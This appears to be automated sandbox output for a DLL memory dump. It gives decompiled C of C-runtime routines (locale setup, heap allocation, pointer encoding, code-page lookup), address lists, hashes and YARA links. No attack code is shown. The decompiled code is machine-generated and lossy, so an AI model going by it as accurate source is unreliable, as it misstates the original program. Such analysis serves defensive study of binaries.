0x6e1a9a6f
0x6e1a9a6f
0x6e1a9a76
0x6e1a9a7d
0x6e1a9a82
0x6e1a9a85
0x6e1a9b5c
0x6e1a9b5c
0x6e1a9b5c
0x00000000
0x6e1a9a8b
0x6e1a9a90
0x6e1a9a93
0x6e1a9a95
0x6e1a9a98
0x6e1a9a9c
0x6e1a9aa3
0x6e1a9b70
0x6e1a9b75
0x6e1a9b7d
0x6e1a9b82
0x6e1a9b87
0x6e1a9b89
0x6e1a9b90
0x6e1a9b98
0x6e1a9b9b
0x6e1a9ba4
0x6e1a9ba7
0x6e1a9baa
0x6e1a9bb1
0x6e1a9c20
0x6e1a9c25
0x6e1a9c2d
0x6e1a9c32
0x6e1a9c35
0x6e1a9c37
0x6e1a9c48
0x6e1a9c48
0x6e1a9c4c
0x6e1a9c4f
0x6e1a9c5b
0x6e1a9c5b
0x6e1a9c68
0x6e1a9c6a
0x6e1a9c6d
0x6e1a9c6f
0x6e1a9c7a
0x6e1a9c7f
0x6e1a9c81
0x6e1a9c84
0x6e1a9c86
0x00000000
0x00000000
0x6e1a9c86
0x6e1a9c51
0x6e1a9c51
0x6e1a9c54
0x00000000
0x6e1a9c56
0x6e1a9c56
0x6e1a9c8c
0x6e1a9c96
0x6e1a9c98
0x6e1a9c9b
0x6e1a9c9e
0x6e1a9ca0
0x6e1a9ca2
0x6e1a9ca9
0x6e1a9cae
0x6e1a9cb0
0x6e1a9cb0
0x6e1a9cb6
0x6e1a9cb7
0x6e1a9cbc
0x6e1a9cc2
0x6e1a9cc2
0x6e1a9ca2
0x6e1a9cc7
0x6e1a9cc9
0x6e1a9cd0
0x6e1a9cda
0x6e1a9cdc
0x6e1a9cdf
0x6e1a9ce1
0x6e1a9ced
0x6e1a9d15
0x6e1a9d15
0x6e1a9ccb
0x6e1a9ccb
0x6e1a9cce
0x00000000
0x00000000
0x6e1a9cce
0x6e1a9cc9
0x6e1a9c54
0x6e1a9d18
0x6e1a9d1f
0x6e1a9c39
0x6e1a9c39
0x6e1a9c3f
0x00000000
0x6e1a9c41
0x6e1a9c41
0x6e1a9c41
0x6e1a9c3f
0x6e1a9d24
0x6e1a9d30
0x6e1a9bb3
0x6e1a9bb3
0x6e1a9bb8
0x6e1a9bbd
0x6e1a9bc2
0x6e1a9bc9
0x6e1a9bcd
0x6e1a9bd7
0x6e1a9be3
0x6e1a9be5
0x6e1a9be5
0x6e1a9be7
0x6e1a9bea
0x6e1a9bf1
0x6e1a9bf6
0x00000000
0x6e1a9bf6
0x6e1a9b8b
0x6e1a9b8b
0x6e1a9bf8
0x6e1a9bfb
0x6e1a9c07
0x6e1a9c07
0x6e1a9aa9
0x6e1a9aa9
0x6e1a9aba
0x6e1a9ac1
0x6e1a9ac6
0x6e1a9ad5
0x6e1a9adb
0x6e1a9ade
0x6e1a9af3
0x6e1a9afa
0x6e1a9b04
0x6e1a9b06
0x6e1a9b06
0x6e1a9ade
0x6e1a9b09
0x6e1a9b10
0x6e1a9b17
0x00000000
0x6e1a9b19
0x6e1a9b1e
0x6e1a9b20
0x6e1a9b23
0x6e1a9b25
0x6e1a9b2e
0x6e1a9b3c
0x6e1a9b42
0x6e1a9b42
0x6e1a9b2e
0x6e1a9b44
0x6e1a9b4c
0x6e1a9b4c
0x6e1a9b5e
0x6e1a9b61
0x6e1a9b6d
0x6e1a9b6d
0x6e1a9aa3

APIs

__RTC_Initialize.LIBCMT ref: 6E1A9ABC

Part of subcall function 6E1AA8C0: InitializeSListHead.KERNEL32(6E221B00,6E1A9AC6,6E216818,00000010,6E1A9A57,?,?,?,6E1A9C7F,?,00000001,?,?,00000001,?,6E216860), ref: 6E1AA8C5

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E1A9B26
___scrt_fastfail.LIBCMT ref: 6E1A9B70

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: c1394aebb59c54e0c48d0672d5b82f3768cc76f0000bf6db2ebcea4dca6ad151
Instruction ID: 10a04bddef8717461bed8662badc3d5d8eb3e14f8310650cf0ec0c92a26fcf10
Opcode Fuzzy Hash: c1394aebb59c54e0c48d0672d5b82f3768cc76f0000bf6db2ebcea4dca6ad151
Instruction Fuzzy Hash: 1321D4395486059EDF009BFCA825FFD37A6AF1226DF200C15D6526B1C1DB2305C4FBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6E18FB55, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E18FB55(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t18;
				intOrPtr _t20;
				void* _t21;
				void* _t22;

				_t22 = __eflags;
				_t13 = __ecx;
				E6E1A9DBF(0x6e1ec447, __ebx, __edi, __esi, 0);
				_t18 = _t13;
				 *_t18 = 0x6e1ee908;
				_t20 = E6E1A9621(__ebx, _t18, __esi, _t22, 8);
				if(_t20 == 0) {
					_t20 = 0;
					__eflags = 0;
				} else {
					 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6E1911F3(__ebx, _t18, _t20); // executed
					 *((intOrPtr*)(_t20 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t18 + 0x34)) = _t20;
				E6E19020C(_t18);
				return E6E1A9D88(_t18);
			}

0x6e18fb55
0x6e18fb55
0x6e18fb5c
0x6e18fb61
0x6e18fb65
0x6e18fb70
0x6e18fb75
0x6e18fb88
0x6e18fb88
0x6e18fb77
0x6e18fb77
0x6e18fb7b
0x6e18fb7d
0x6e18fb83
0x6e18fb83
0x6e18fb8c
0x6e18fb8f
0x6e18fb9b

APIs

__EH_prolog3.LIBCMT ref: 6E18FB5C
std::locale::_Init.LIBCPMT ref: 6E18FB7D

Part of subcall function 6E1911F3: __EH_prolog3.LIBCMT ref: 6E1911FA
Part of subcall function 6E1911F3: std::_Lockit::_Lockit.LIBCPMT ref: 6E191205
Part of subcall function 6E1911F3: std::locale::_Setgloballocale.LIBCPMT ref: 6E191220
Part of subcall function 6E1911F3: _Yarn.LIBCPMT ref: 6E191236
Part of subcall function 6E1911F3: std::_Lockit::~_Lockit.LIBCPMT ref: 6E191276

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: e694a0c4611a81984663db837e595fce2248b7d3e91a4dd8c260b1e6a7a0621e
Instruction ID: 09987e9762f7f90e9a188363d40d714d3fa9c6d58b2f85fbe32e05a0ac100dca
Opcode Fuzzy Hash: e694a0c4611a81984663db837e595fce2248b7d3e91a4dd8c260b1e6a7a0621e
Instruction Fuzzy Hash: BCE0DF36A11A115BD211ABECA4213ADB6997F88B24F710409E521AF680CFB18DC0BB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D16BE, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1D16BE(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6e222494, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6E1DFA43();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6E1C23F4(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E6E1CD4F6(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6e1d16c4
0x6e1d16c9
0x6e1d16d7
0x6e1d16d7
0x6e1d16dd
0x6e1d16df
0x6e1d16df
0x6e1d16f6
0x6e1d16ff
0x6e1d1707
0x00000000
0x00000000
0x6e1d16e7
0x6e1d16e9
0x6e1d170b
0x6e1d1710
0x6e1d1716
0x00000000
0x6e1d1716
0x6e1d16f2
0x6e1d16f4
0x00000000
0x00000000
0x6e1d16f4
0x00000000
0x6e1d16f6
0x6e1d16cf
0x6e1d16d5
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000010,00000000,?,6E1CF8EB,00000001,00000364,00000006,000000FF,?,6E1C23F9,6E1D1C61,00000001,?,6E1A963B,6E17DCEA), ref: 6E1D16FF

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 69b2058982d11b048875696abe8a8f32ced44b9224579d81ee3f323e19aff4d4
Instruction ID: 83a5510ecc080a0dbb65f974bdeecef91a58e63cee46ebc0fa59ab773b43f5d0
Opcode Fuzzy Hash: 69b2058982d11b048875696abe8a8f32ced44b9224579d81ee3f323e19aff4d4
Instruction Fuzzy Hash: 92F024363046355BEB518BEA8814E8B376DAB52670B258511EE24D7090CB60D9CCB6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E192FA1, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E6E192FA1(intOrPtr __eax, intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __fp0, signed short _a2, intOrPtr _a4, signed int _a8) {
				long long _v0;
				long long _v4;
				char _v12;
				long long _v20;
				long long _v40;
				long long _v44;
				long long _v52;
				void* __ebp;
				void* _t47;
				void* _t54;
				void* _t55;
				signed int _t63;
				int _t65;
				intOrPtr _t68;
				void* _t69;
				signed int _t73;
				signed int _t74;
				signed int _t78;
				signed int _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t86;
				void* _t90;
				void* _t91;
				void* _t92;
				long long _t103;
				long long _t104;
				long long _t108;
				long long _t114;
				long long _t115;
				long long _t117;

				_t85 = __esi;
				_t82 = __edi;
				_t80 = __edx;
				_t68 = __ebx;
				if( *0x6e218008 == 0) {
					__eflags = E6E1D854D();
					if(__eflags != 0) {
						E6E1D85A4(__eflags, __fp0);
						_t69 = 0x16;
					}
					__eflags =  *0x6e218188 & 0x00000002;
					if(( *0x6e218188 & 0x00000002) != 0) {
						_t65 = IsProcessorFeaturePresent(0x17);
						__eflags = _t65;
						if(_t65 != 0) {
							_t69 = 7;
							asm("int 0x29");
						}
						E6E1C20F2(_t68, _t80, _t82, _t85, 3, 0x40000015, 1);
						_t90 = _t90 + 0xc;
					}
					E6E1CDA3F(3);
					asm("int3");
					_t91 = _t90 - 0xc;
					_push(_t85);
					_push(_t82);
					_t47 = E6E1D3890(_t69, 0x133f, 0xffff);
					_t103 = _v4;
					_t86 = _t47;
					_t73 = _a2 & 0x7ff0;
					__eflags = _t73 - 0x7ff0;
					if(_t73 != 0x7ff0) {
						asm("fldz");
						asm("fucomp st1");
						asm("fnstsw ax");
						__eflags = 0x40;
						if(0x40 != 0) {
							_v44 = _t103;
							E6E1D359E( &_v12, _t68, _t73, _t73,  &_v12);
							_t74 = _a8;
							_t92 = _t91 + 0xc;
							_t81 = _v12;
							__eflags = _t74;
							if(_t74 >= 0) {
								__eflags = _t81 - 0x7fffffff - _t74;
								if(_t81 > 0x7fffffff - _t74) {
									goto L32;
								} else {
									goto L23;
								}
							} else {
								__eflags = _t81 - 0x80000000 - _t74;
								if(__eflags < 0) {
									L27:
									asm("fldz");
									asm("fmulp st1, st0");
									_push(_t86);
									_t93 = _t92 - 0x18;
									_v44 = _t103;
									asm("fild dword [ebp+0x10]");
									_v20 = _t103;
									_t108 = _v20;
									goto L28;
								} else {
									L23:
									_t55 = _t81 + _t74;
									__eflags = _t55 - 0xa00;
									if(_t55 > 0xa00) {
										L32:
										_push(_t86);
										_t93 = _t92 - 0x10;
										_v44 = _t103;
										_t104 =  *0x6e1f5800;
										_v52 = _t104;
										E6E1D89A7(_t74);
										_v44 = _t104;
										asm("fild dword [ebp+0x10]");
										_v20 = _t104;
										_v52 = _v20;
										_push(_t74);
										_push(_t74);
										goto L33;
									} else {
										__eflags = _t55 - 0x400;
										if(_t55 <= 0x400) {
											__eflags = _t55 - 0xfffff603;
											if(__eflags >= 0) {
												__eflags = _t55 - 0xfffffc03;
												if(_t55 >= 0xfffffc03) {
													_v44 = _t103;
													E6E1D36AF(_t74, _t74, _t74, _t55);
													_v20 = _t103;
													_t54 = E6E1D3890(_t74, _t86, 0xffff);
													goto L14;
												} else {
													_v44 = _t103;
													E6E1D36AF(_t74, _t74, _t74, _t55 + 0x600);
													_push(_t86);
													_t93 = _t92 + 0xc - 0x18;
													_v44 = _t103;
													asm("fild dword [ebp+0x10]");
													_v20 = _t103;
													_t108 = _v20;
													L28:
													_v52 = _t108;
													 *_t93 = _v0;
													_push(0x19);
													_push(0x12);
													goto L34;
												}
											} else {
												goto L27;
											}
										} else {
											_v44 = _t103;
											E6E1D36AF(_t74, _t74, _t74, _t55 + 0xfffffa00);
											_push(_t86);
											_t93 = _t92 + 0xc - 0x18;
											_v44 = _t103;
											asm("fild dword [ebp+0x10]");
											_v20 = _t103;
											_v52 = _v20;
											L33:
											 *_t93 = _v0;
											_push(0x19);
											_push(0x11);
											goto L34;
										}
									}
								}
							}
						} else {
							st0 = _t103;
							goto L18;
						}
					} else {
						_push(_t73);
						_v40 = _t103;
						_t63 = E6E1D36DC();
						_t74 = _t73;
						__eflags = _t63;
						if(__eflags <= 0) {
							L15:
							_t114 =  *0x6e1f38b8 + st1;
							_push(_t86);
							_t93 = _t91 - 0x18;
							_v44 = _t114;
							asm("fild dword [ebp+0x10]");
							_v20 = _t114;
							_t115 = _v20;
							_v52 = _t115;
							 *(_t91 - 0x18) = _t115;
							_push(0x19);
							_push(8);
							L34:
							_t54 = E6E1D2E64(_t74, 0xffff, _t86, __eflags);
						} else {
							__eflags = _t63 - 2;
							if(_t63 <= 2) {
								L18:
								_t54 = E6E1D3890(_t73, _t86, 0xffff);
							} else {
								__eflags = _t63 - 3;
								if(__eflags != 0) {
									goto L15;
								} else {
									asm("fild dword [ebp+0x10]");
									_v20 = _t103;
									_v40 = _v20;
									_t117 = _v0;
									 *((long long*)(_t91 - 0x10)) = _t117;
									E6E1D3157(_t63);
									_v20 = _t117;
									_t54 = E6E1D3890(_t74, _t86, 0xffff);
									L14:
								}
							}
						}
					}
					return _t54;
				} else {
					__imp__EncodePointer(_a4);
					_t78 =  *0x6e218008; // 0x9
					_t79 = _t78 - 1;
					 *0x6e218008 = _t79;
					 *((intOrPtr*)(0x6e2215b8 + _t79 * 4)) = __eax;
					return __eax;
				}
			}

0x6e192fa1
0x6e192fa1
0x6e192fa1
0x6e192fa1
0x6e192fab
0x6e1c4d5d
0x6e1c4d5f
0x6e1c4d63
0x6e1c4d68
0x6e1c4d68
0x6e1c4d69
0x6e1c4d70
0x6e1c4d74
0x6e1c4d7a
0x6e1c4d7c
0x6e1c4d80
0x6e1c4d81
0x6e1c4d81
0x6e1c4d8c
0x6e1c4d91
0x6e1c4d91
0x6e1c4d96
0x6e1c4d9b
0x6e1c4da1
0x6e1c4da4
0x6e1c4da5
0x6e1c4db1
0x6e1c4db6
0x6e1c4db9
0x6e1c4dc6
0x6e1c4dc8
0x6e1c4dcb
0x6e1c4e43
0x6e1c4e45
0x6e1c4e47
0x6e1c4e49
0x6e1c4e4c
0x6e1c4e67
0x6e1c4e6a
0x6e1c4e6f
0x6e1c4e72
0x6e1c4e75
0x6e1c4e78
0x6e1c4e7a
0x6e1c4e90
0x6e1c4e92
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c4e7c
0x6e1c4e83
0x6e1c4e85
0x6e1c4ee1
0x6e1c4ee1
0x6e1c4ee3
0x6e1c4ee5
0x6e1c4ee6
0x6e1c4ee9
0x6e1c4eed
0x6e1c4ef0
0x6e1c4ef3
0x00000000
0x6e1c4e87
0x6e1c4e98
0x6e1c4e98
0x6e1c4e9b
0x6e1c4ea0
0x6e1c4f50
0x6e1c4f50
0x6e1c4f51
0x6e1c4f54
0x6e1c4f58
0x6e1c4f5e
0x6e1c4f61
0x6e1c4f66
0x6e1c4f6a
0x6e1c4f6d
0x6e1c4f73
0x6e1c4f76
0x6e1c4f77
0x00000000
0x6e1c4ea6
0x6e1c4ea6
0x6e1c4eab
0x6e1c4eda
0x6e1c4edf
0x6e1c4f06
0x6e1c4f0b
0x6e1c4f36
0x6e1c4f39
0x6e1c4f40
0x6e1c4f43
0x00000000
0x6e1c4f0d
0x6e1c4f15
0x6e1c4f18
0x6e1c4f20
0x6e1c4f21
0x6e1c4f24
0x6e1c4f28
0x6e1c4f2b
0x6e1c4f2e
0x6e1c4ef6
0x6e1c4ef6
0x6e1c4efd
0x6e1c4f00
0x6e1c4f02
0x00000000
0x6e1c4f02
0x00000000
0x00000000
0x00000000
0x6e1c4ead
0x6e1c4eb5
0x6e1c4eb8
0x6e1c4ec0
0x6e1c4ec1
0x6e1c4ec4
0x6e1c4ec8
0x6e1c4ecb
0x6e1c4ed1
0x6e1c4f78
0x6e1c4f7b
0x6e1c4f7e
0x6e1c4f80
0x00000000
0x6e1c4f80
0x6e1c4eab
0x6e1c4ea0
0x6e1c4e85
0x6e1c4e4e
0x6e1c4e4e
0x00000000
0x6e1c4e4e
0x6e1c4dcd
0x6e1c4dcd
0x6e1c4dcf
0x6e1c4dd2
0x6e1c4dd8
0x6e1c4dd9
0x6e1c4ddb
0x6e1c4e17
0x6e1c4e20
0x6e1c4e22
0x6e1c4e23
0x6e1c4e26
0x6e1c4e2a
0x6e1c4e2d
0x6e1c4e30
0x6e1c4e33
0x6e1c4e37
0x6e1c4e3a
0x6e1c4e3c
0x6e1c4f82
0x6e1c4f82
0x6e1c4ddd
0x6e1c4ddd
0x6e1c4de0
0x6e1c4e50
0x6e1c4e52
0x6e1c4de2
0x6e1c4de2
0x6e1c4de5
0x00000000
0x6e1c4de7
0x6e1c4de7
0x6e1c4ded
0x6e1c4df3
0x6e1c4df7
0x6e1c4dfa
0x6e1c4dfd
0x6e1c4e04
0x6e1c4e07
0x6e1c4e0f
0x6e1c4e0f
0x6e1c4de5
0x6e1c4de0
0x6e1c4ddb
0x6e1c4f8d
0x6e192fb1
0x6e192fb4
0x6e192fba
0x6e192fc0
0x6e192fc1
0x6e192fc7
0x6e192fcf
0x6e192fcf

APIs

RtlEncodePointer.NTDLL(?,?,6E1913C8,6E191439,?,6E191225,00000000,00000000,00000000,00000004,6E17F9C2,00000001,00000004,6E17E827,00000008,6E17DD7A), ref: 6E192FB4

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: ae206b68ced150e32a381ad06cd9b966016a2d4ecc4ad1bbc4ec21322cf6a0da
Instruction ID: 47c0e5935ced61e686b5ed487e6976646d3b802fce5495202af9939cbc35ffe0
Opcode Fuzzy Hash: ae206b68ced150e32a381ad06cd9b966016a2d4ecc4ad1bbc4ec21322cf6a0da
Instruction Fuzzy Hash: A3D0C771048D08DFCF086F54E99DA643BA6F716355F10412CF60D41650CF7557E8DB55

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1DEECF, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1DEECF(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				signed int _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t132;
				signed int _t133;

				_t162 = __fp0;
				_push(__ecx);
				_push(__ecx);
				_t85 = _a4;
				_push(__esi);
				_push(__edi);
				_t33 = E6E1CF749(__ecx, __edx, __fp0);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E6E1DEE62(0x6e1f64f8, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E6E1DE78D(_t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E6E1DE8AD();
					} else {
						E6E1DE814(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E6E1DEE62(0x6e1f61e8, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E6E1DE8AD();
							} else {
								E6E1DE814(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E6E1DECD9(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x6
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
							_t47 = E6E1DE6DB(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E1C22EF();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0x6e21801c; // 0x57d971a9
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E6E1CF749(_t98, _t115, _t162);
								_t88 = _t52;
								_t121 =  *(E6E1CF749(_t98, _t115, _t162) + 0x34c);
								_t128 = E6E1DF628(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E6E1DA21C(_t121, _t128, _t162,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E6E1DF75A(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								return E6E1A93EA(_v12 ^ _t131);
							} else {
								if(E6E1D46E7(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xd0
									if(E6E1D46E7(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E6E1E9087(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xd0
											if(E6E1D46E7(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E6E1E9087(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E6E1E60C1(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E6E1DE6DB(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x6e1deecf
0x6e1deed4
0x6e1deed5
0x6e1deed7
0x6e1deeda
0x6e1deedb
0x6e1deedc
0x6e1deee3
0x6e1deee5
0x6e1deee8
0x6e1deee8
0x6e1deeeb
0x6e1deeeb
0x6e1deef1
0x6e1deef4
0x6e1deef7
0x6e1deef7
0x6e1deefa
0x6e1deefd
0x6e1deeff
0x6e1def05
0x6e1def07
0x6e1def0c
0x6e1def16
0x6e1def1b
0x6e1def1d
0x6e1def20
0x6e1def20
0x6e1def22
0x6e1def26
0x6e1def6f
0x00000000
0x6e1def28
0x6e1def2d
0x6e1def36
0x6e1def2f
0x6e1def2f
0x6e1def2f
0x6e1def41
0x6e1def4b
0x6e1def50
0x6e1def55
0x6e1def5b
0x6e1def5f
0x6e1def68
0x6e1def61
0x6e1def61
0x6e1def61
0x6e1def74
0x6e1def74
0x6e1def55
0x6e1def41
0x6e1def7a
0x6e1df0b6
0x6e1df0b6
0x00000000
0x6e1def80
0x6e1def80
0x6e1def89
0x6e1def9a
0x6e1def90
0x6e1def90
0x6e1def90
0x6e1defa1
0x6e1defa5
0x00000000
0x6e1defc9
0x6e1defc9
0x6e1defce
0x6e1defd0
0x6e1defd0
0x6e1defd2
0x6e1defd7
0x6e1df0b1
0x6e1df0b3
0x6e1df0b8
0x6e1df0bc
0x6e1defdd
0x6e1defdd
0x6e1defe0
0x6e1defe0
0x6e1defe8
0x6e1defeb
0x6e1defeb
0x6e1defee
0x6e1defee
0x6e1deff1
0x6e1deff4
0x6e1deffe
0x6e1df008
0x6e1df00d
0x6e1df012
0x6e1df0bd
0x6e1df0bf
0x6e1df0c0
0x6e1df0c1
0x6e1df0c2
0x6e1df0c3
0x6e1df0c4
0x6e1df0c9
0x6e1df0cd
0x6e1df0d5
0x6e1df0dc
0x6e1df0df
0x6e1df0e0
0x6e1df0e4
0x6e1df0e5
0x6e1df0ea
0x6e1df0f2
0x6e1df101
0x6e1df10d
0x6e1df11e
0x6e1df126
0x6e1df140
0x6e1df14d
0x6e1df150
0x6e1df153
0x6e1df153
0x6e1df128
0x6e1df128
0x6e1df12a
0x6e1df16e
0x6e1df018
